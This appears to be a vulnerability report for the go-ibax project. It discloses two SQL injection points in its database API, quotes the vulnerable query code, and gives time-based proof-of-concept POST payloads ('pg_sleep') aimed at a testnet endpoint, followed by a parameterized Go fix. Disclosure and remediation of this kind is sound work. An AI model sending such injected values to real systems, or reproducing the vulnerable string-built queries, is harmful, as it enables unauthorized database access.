Describe the bug

There are two SQL injection vulnerabilities.

First place

file: go-ibax/packages/api/database.go
Line 92 in 6bac746

query:=fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)

POC:

POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--

Second place

file: go-ibax/packages/api/database.go
Line 120 in 6bac746

sqlQuery:=fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)

POC:

POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--

Reproduction

POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--

As you can see, when I use pg_sleep, the request is delayed 3s.
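A hardened way to build the tablesInfo query from the first finding, added here as an example and not the project's own fix: the form struct, the ORDER BY allowlist and the table-name pattern are assumptions. User input is bound as parameters, page and limit are validated integers, and the ORDER BY expression is looked up rather than interpolated, so the "1; select pg_sleep(3)--" value is rejected instead of executed.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
)

// TablesInfoForm mirrors the fields the handler reads from the request
// (hypothetical struct; the project's own form type is not shown on the page).
type TablesInfoForm struct {
	TableName string
	Order     string
	Page      int
	Limit     int
}

// orderAllowlist is the only set of ORDER BY expressions accepted (assumed).
var orderAllowlist = map[string]string{
	"tablename":      "tablename",
	"tablename_desc": "tablename DESC",
}

// tableNamePattern keeps LIKE wildcards and SQL syntax out of the filter.
var tableNamePattern = regexp.MustCompile(`^[A-Za-z0-9_]{0,64}$`)

// BuildTablesInfoQuery returns the SQL text and bound parameters for the
// tablesInfo listing. No request value ever becomes SQL text: the LIKE
// pattern is $1, offset and limit are validated integers bound as $2/$3,
// and the ORDER BY expression comes from the fixed allowlist.
func BuildTablesInfoQuery(form TablesInfoForm) (string, []interface{}, error) {
	if !tableNamePattern.MatchString(form.TableName) {
		return "", nil, errors.New("invalid table_name")
	}
	orderExpr, ok := orderAllowlist[form.Order]
	if !ok {
		return "", nil, fmt.Errorf("order %q not permitted", form.Order)
	}
	if form.Page < 1 || form.Limit < 1 || form.Limit > 1000 {
		return "", nil, errors.New("page and limit must be positive (limit <= 1000)")
	}
	query := fmt.Sprintf("SELECT tablename FROM pg_tables WHERE schemaname = 'public' AND tablename LIKE $1 ORDER BY %s OFFSET $2 LIMIT $3", orderExpr)
	args := []interface{}{"%" + form.TableName + "%", (form.Page - 1) * form.Limit, form.Limit}
	return query, args, nil
}

func main() {
	q, args, err := BuildTablesInfoQuery(TablesInfoForm{TableName: "block", Order: "tablename", Page: 2, Limit: 10})
	fmt.Println(q, args, err)
	_, _, err = BuildTablesInfoQuery(TablesInfoForm{Order: "1; select pg_sleep(3)--", Page: 1, Limit: 1})
	fmt.Println("rejected:", err)
}
```

The query string and args would then be passed to db.Query(query, args...) so the driver sends the values separately from the statement text.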